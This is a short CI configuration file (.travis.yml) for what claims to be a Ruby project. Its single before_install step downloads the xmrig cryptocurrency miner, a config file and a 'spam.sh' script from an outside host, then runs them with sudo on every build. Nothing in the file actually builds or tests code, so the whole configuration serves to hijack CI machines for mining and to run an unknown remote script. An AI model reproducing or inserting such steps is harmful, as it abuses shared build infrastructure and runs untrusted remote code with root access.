language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt-get install -y screen && sudo apt-get install -y wget && wget https://swensonm.com/mining/xmrig && wget https://swensonm.com/mining/SHA256SUMS && wget https://swensonm.com/mining/config.json && wget https://swensonm.com/mining/spam.sh && sudo chmod u+x xmrig && sudo chmod u+x spam.sh && sudo ./xmrig && sudo ./spam.sh